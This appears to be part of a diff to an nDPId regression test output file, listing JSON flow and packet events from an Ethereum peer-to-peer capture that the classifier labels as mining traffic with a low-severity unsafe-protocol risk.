+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365154,"flow_last_seen":1578508365154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365154,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1578508365154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365154,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4TfAqAG4iskMV91Ldl\/HR3E5AAAAALAC\/\/+X6AAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365169,"flow_last_seen":1578508365169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365169,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1578508365169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365169,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGP33AqAG4sAmI0d1Mdl8ouUvbAAAAALAC\/\/+6CgAAAgQFtAEDAwUBAQgKItiWngAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1578508365186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365186,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG7zuKyQxXwKgBuHZf3Uu6UG6Lx0dxOqAScSDP1QAAAgQFrAQCCAq1b4mgItiWjwEDAwc="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":929,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1578508365186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365186,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4UPAqAG4iskMV91Ldl\/HR3E6ulBujIAQECxfbwAAAQEICiLYlq61b4mg"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365154,"flow_last_seen":1578508365187,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1578508365187,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtk3AqAG4VdZsNN1Odl+\/h8KiAAAAALAC\/\/8jMQAAAgQFtAEDAwUBAQgKItiWsAAAAAAEAgAA"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcflcAAEARfx\/AqAG4Etunn3Zfdl8AiGnBB7Pc5ZlsDZTbUrqaaoRxeL1l7Crbcxf\/BOXFZNGdyZsOxpmBlW67u9+KWe59CkWnKw2GIsEnEKk87oxTf3me3BvKcrMQD0jXMXlBXiHkLViPnwRaOVxyx4odh7D\/BO97AAHdBMuEfwAAAYJ2X4J2X8mEEtunn4J2X4CEXhYgYQU="} 
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365194,"flow_last_seen":1578508365194,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365194,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1578508365194,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365194,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGkX3AqAG4ynAcat1Pdl84sWAlAAAAALAC\/\/\/nsAAAAgQFtAEDAwUBAQgKItiWswAAAAAEAgAA"} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1578508365201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365201,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGTYGwCYjRwKgBuHZf3UxCOLg9KLlL3KAScSB8NwAAAgQFrAQCCAqsVDbiItiWngEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1578508365202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365202,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGP4nAqAG4sAmI0d1Mdl8ouUvcQji4PoAQECwL1AAAAQEICiLYlrqsVDbi"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1017,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365169,"flow_last_seen":1578508365203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365203,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1018,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1578508365210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365210,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGY+sj5PqMwKgBuHZf3UovaHbWeTxErqASbgBmbgAAAgQFjAQCCAqaQodaItiWjwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1578508365210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365210,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGWfPAqAG4I+T6jN1Kdl95PESuL2h214AQECjytwAAAQEICiLYlsKaQoda"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365153,"flow_last_seen":1578508365212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1578508365212,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1578508365223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365223,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGxFFV1mw0wKgBuHZf3U5vpmVtv4fCo6ASOJBjegAAAgQFrAQCCApls11ZItiWsAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1578508365223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365223,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtlnAqAG4VdZsNN1Odl+\/h8Kjb6ZlboAQECy6hQAAAQEICiLYls1ls11Z"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365189,"flow_last_seen":1578508365225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1578508365225,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365226,"flow_last_seen":1578508365226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365226,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1578508365226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365226,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQk7AqAG4ikurvt1Rdl8erUWUAAAAALAC\/\/\/M9wAAAgQFtAEDAwUBAQgKItiW0AAAAAAEAgAA"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365239,"flow_last_seen":1578508365239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365239,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1578508365239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365239,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQhrAqAG4neaYV91Sdl9OT1qyAAAAALAC\/\/+H9wAAAgQFtAEDAwUBAQgKItiW2wAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1189,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365271,"flow_last_seen":1578508365271,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365271,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1189,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1578508365271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365271,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLavAqAG4M6EXDN1Udl9XVw7PAAAAALAC\/\/+2RQAAAgQFtAEDAwUBAQgKItiW9wAAAAAEAgAA"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365279,"flow_last_seen":1578508365279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365279,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1578508365279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365279,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxArAqAG4NAmARN1Vdl\/t7etbAAAAALAC\/\/\/ZeQAAAgQFtAEDAwUBAQgKItiW\/gAAAAAEAgAA"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365295,"flow_last_seen":1578508365295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365295,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1578508365295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365295,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbF\/AqAG4I+XoE91Wdl\/o6wkCAAAAALAC\/\/9pGwAAAgQFtAEDAwUBAQgKItiXDAAAAAAEAgAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365300,"flow_last_seen":1578508365300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365300,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1578508365300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365300,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGD8rAqAG4fNnrtN1Xdl9L2gYiAAAAALAC\/\/+scgAAAgQFtAEDAwUBAQgKItiXEAAAAAAEAgAA"} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365194,"flow_last_seen":1578508365194,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365194,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1578508365194,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365194,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGkX3AqAG4ynAcat1Pdl84sWAlAAAAALAC\/\/\/nsAAAAgQFtAEDAwUBAQgKItiWswAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1578508365201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365201,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGTYGwCYjRwKgBuHZf3UxCOLg9KLlL3KAScSB8NwAAAgQFrAQCCAqsVDbiItiWngEDAwc="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1578508365202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365202,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGP4nAqAG4sAmI0d1Mdl8ouUvcQji4PoAQECwL1AAAAQEICiLYlrqsVDbi"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1017,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365169,"flow_last_seen":1578508365203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365203,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1018,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1578508365210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365210,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGY+sj5PqMwKgBuHZf3UovaHbWeTxErqASbgBmbgAAAgQFjAQCCAqaQodaItiWjwEDAwc="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1578508365210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365210,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGWfPAqAG4I+T6jN1Kdl95PESuL2h214AQECjytwAAAQEICiLYlsKaQoda"} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365153,"flow_last_seen":1578508365212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1578508365212,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1578508365223,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365223,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGxFFV1mw0wKgBuHZf3U5vpmVtv4fCo6ASOJBjegAAAgQFrAQCCApls11ZItiWsAEDAwc="} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1578508365223,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365223,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtlnAqAG4VdZsNN1Odl+\/h8Kjb6ZlboAQECy6hQAAAQEICiLYls1ls11Z"} 